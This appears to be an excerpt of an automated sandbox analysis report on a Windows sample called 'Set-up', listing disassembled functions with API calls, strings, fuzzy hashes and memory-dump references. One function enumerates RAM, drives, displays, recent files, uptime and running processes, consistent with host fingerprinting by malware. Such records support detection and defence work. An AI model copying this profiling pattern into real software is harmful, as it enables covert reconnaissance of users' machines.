Instruction ID: 35083ee77d25a777e10d2c4341db203ccc323fb4c68435dd0e5edd15b9a1291c
Opcode Fuzzy Hash: ccbb554f86fbfa3c3e8f18c359ba2bc8bc7740f13415fe9670694773b0a21f84
Instruction Fuzzy Hash: E7E1E4B49057099FDB00EFA8D9847ADBBF4BF44344F008969E988DB340E7749998CF42

Function 0051255D Relevance: 49.3, APIs: 13, Strings: 15, Instructions: 282
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00512579

Part of subcall function 009BB130: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00512589), ref: 009BB145

GlobalMemoryStatusEx.KERNELBASE ref: 005125CC
GetLogicalDriveStringsA.KERNEL32 ref: 00512619
GetDriveTypeA.KERNELBASE ref: 00512647
GetDiskFreeSpaceExA.KERNELBASE ref: 0051267E
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00512749
KiUserCallbackDispatcher.NTDLL ref: 005127E2
SHGetKnownFolderPath.SHELL32 ref: 0051286D
wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 005128BE
wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 005128D4
FindFirstFileW.KERNELBASE ref: 005128F8
FindNextFileW.KERNELBASE ref: 0051291F
K32EnumProcesses.KERNEL32 ref: 0051296F

Strings

;%Q, xrefs: 005127FE
drivers, xrefs: 00512769
resolution_x, xrefs: 0051280D
free, xrefs: 0051271E
`, xrefs: 005129BC
uptime_minutes, xrefs: 005129E4
Num_displays, xrefs: 005127C3
recent_files, xrefs: 00512941
Num_ram, xrefs: 005125F0
@, xrefs: 005125B4
resolution_y, xrefs: 0051282F
processes, xrefs: 00512996
Num_processor, xrefs: 0051258D
name, xrefs: 005126A2
all, xrefs: 005126E0

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
String ID: ;%Q$@$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
API String ID: 2116500361-1895345988
Opcode ID: f1b8b6194c9382e85d32a888df86391e18f4256f681c28f0a5c5adb612364c01
Instruction ID: 024bb2ce185ecd4068319e98a36712d3aa07818d6bbeae28980adba64a15d1fd
Opcode Fuzzy Hash: f1b8b6194c9382e85d32a888df86391e18f4256f681c28f0a5c5adb612364c01
Instruction Fuzzy Hash: F2D1A3B49057099FCB00EFA8C98579EBBF0BF84354F008969E898D7351E7749A84CF92

Function 005DAA30 Relevance: 19.9, APIs: 13, Instructions: 364
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32(?), ref: 005DAAE8
htons.WS2_32(?), ref: 005DAB33
socket.WS2_32(FFFFFFFF,?,00000000), ref: 005DAB9A
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 005DABE3
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 005DAC02
setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 005DAC29
htonl.WS2_32(00000000), ref: 005DAC69
bind.WS2_32(?,00000017,0000001C), ref: 005DACCF
setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 005DACFE
setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 005DAD20
WSAGetLastError.WS2_32 ref: 005DADB5
closesocket.WS2_32(?), ref: 005DAE6F

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
String ID:
API String ID: 4039825230-0
Opcode ID: e84ff0cff3db9261756509685e51a0449421e0c05721c21774e0d20171478a58
Instruction ID: 25fef0076d495f7c34cf2a7de105389f99a05121de04a4c3a81f3d11bac64ab7
Opcode Fuzzy Hash: e84ff0cff3db9261756509685e51a0449421e0c05721c21774e0d20171478a58
Instruction Fuzzy Hash: F1E17C746003019FE7208F28C845B6BBBA5FF89314F144A2EF9999B3A1E775D944CB92

Function 0051116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 005111B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00511238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00511261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005112EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00511323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0051132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00511344
GetStartupInfoA.KERNEL32 ref: 00511433

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: 4f70f2dee93e80c74444dbd7208b17c1d567712f034c653bafe819499a2aacae
Instruction ID: a14da17ed3f471e24f981346caaf104145da57ceaeec9b5c2fb9e6ba30176f55
Opcode Fuzzy Hash: 4f70f2dee93e80c74444dbd7208b17c1d567712f034c653bafe819499a2aacae
Instruction Fuzzy Hash: 3481BFB99046118FEB10EFA8D9853AEBBF0FB46300F04486DEA95C7251D7759884CB86

Function 00898E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 00898EAD
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00898EFA
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00898F4A
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00898F59

Strings

terminated, xrefs: 00898F20
CONOUT$, xrefs: 00898EA6
@, xrefs: 009C2A21

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: f54552f4d7a7d3e6551b1f100bbf564c4b04e19b608e6df4a33f5810d950dcc4
Instruction ID: cce9d0ead32f409bb662cf026e4e7f25963b5c9a74fd54261f5c3df39c7d7842
Opcode Fuzzy Hash: f54552f4d7a7d3e6551b1f100bbf564c4b04e19b608e6df4a33f5810d950dcc4
Instruction Fuzzy Hash: 344118B4904206CFDB10EF79D844BAEBBE4FB49314F048A2DE899D7290EB74D845CB56

Function 005205B0 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 369
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,?,?), ref: 00520711
getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00520783
WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0052086F
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 005208EF
WSAEventSelect.WS2_32(?,?,00000000), ref: 00520934
WSAEventSelect.WS2_32(?,?,00000000), ref: 005209DC
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 005209FB
WSAResetEvent.WS2_32(?), ref: 00520A1F

Strings

N=Q, xrefs: 00520A65
multi.c, xrefs: 005207B2

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
String ID: N=Q$multi.c
API String ID: 3264668090-4211762853
Opcode ID: bd6803a5b5979b188944fe2744244604f80e2e6888a7b4b04fcf239bd45853e5
Instruction ID: bc23d85c428fd6698ce12e30ae97ec2f72488fb8948f76c618a0b79970f914df
Opcode Fuzzy Hash: bd6803a5b5979b188944fe2744244604f80e2e6888a7b4b04fcf239bd45853e5
Instruction Fuzzy Hash: AFD1CF756093069FE710DF24E885BAB7BE9FF95308F08582CF885822D2E774E945CB52

Function 009B8E70 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

error CryptGenRandom 0x%08lx, xrefs: 009B8FE9

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: error CryptGenRandom 0x%08lx
API String ID: 0-1222942552
Opcode ID: e67713e7a268cf508fd487c4a072121edefe94b6371c06a53f7919806dc0999d
Instruction ID: b91a5be093e32e03dd28a26111a0cc2a20110f64dbb3a0ea6c324975c5eb5198
Opcode Fuzzy Hash: e67713e7a268cf508fd487c4a072121edefe94b6371c06a53f7919806dc0999d
Instruction Fuzzy Hash: A141B0B95093019FD700EF78D58975EBBE4BB89314F458A2DF889C7364EB74C5488B82

Function 00526FA0 Relevance: 13.8, APIs: 9, Instructions: 255sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 00527010

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e1a6f52a6e51f2e71e7302860bd8e29b55c97b8f19bf1d6a8c5bef3c637daa19
Instruction ID: a560fef478f4cae4c22b293c831ed83bc47226edcf0cf7f5e1d0f84a481daeea
Opcode Fuzzy Hash: e1a6f52a6e51f2e71e7302860bd8e29b55c97b8f19bf1d6a8c5bef3c637daa19
Instruction Fuzzy Hash: 0491043460C32D8BD735DB28E8947BB7AD5FFDA320F148A2CE895821D4D7749C50DA91

Function 005111A3 Relevance: 12.1, APIs: 8, Instructions: 115sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 005111B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00511238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00511261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005112EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00511323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0051132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00511344
_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051140C

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 1209083157-0
Opcode ID: 1796820d4626cf782f6fba6b69efd79871de3ca284ff646766a69c1d977e6e21
Instruction ID: db7b770cbcd51513b7b4258301ec420a2aababcdb3353544bc6faf4077ff6966
Opcode Fuzzy Hash: 1796820d4626cf782f6fba6b69efd79871de3ca284ff646766a69c1d977e6e21
Instruction Fuzzy Hash: 18413BB4A047118BEB10EFA8E98479EBBF0FB49300F05496DE98597350DB709884CB96

Function 005113C9 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00511238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00511261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005112EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00511323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0051132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00511344

Part of subcall function 00898A20: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,005113EF), ref: 00898A2A

_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051140C

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__acrt_iob_func__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 2715571461-0
Opcode ID: cdf9afb287e74d172b28f239f2e6e18e445a4da4fe88bb03f99eb24f463a7cd1
Instruction ID: 6df92a81c8f1ae286ef71084ed1c679ea0fb7314002e8e74efbe419a911b7ad7
Opcode Fuzzy Hash: cdf9afb287e74d172b28f239f2e6e18e445a4da4fe88bb03f99eb24f463a7cd1
Instruction Fuzzy Hash: 3F4117B89047118BEB10EFA8E98579EBBF0FB4A300F15486DEA8597351DB749884CB46

Function 00511160 Relevance: 10.6, APIs: 7, Instructions: 131sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 005111B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00511238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00511261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005112EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00511323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0051132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00511344
GetStartupInfoA.KERNEL32 ref: 00511433

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: 0eefb0f36392f3f19e2b5691aff79c047e59570ee04d2030f3bd25364e3917ce
Instruction ID: 4119a358ab01ddcb6446015457caeaf65320b66144756c2466de8a3bba28a6a6
Opcode Fuzzy Hash: 0eefb0f36392f3f19e2b5691aff79c047e59570ee04d2030f3bd25364e3917ce
Instruction Fuzzy Hash: F3517E759047118FEB10EFA8E98479EBBF0FB4A300F15496CEA55DB350DB719880CB86

Function 005DA8C0 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?), ref: 005DA90C

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: recvfrom
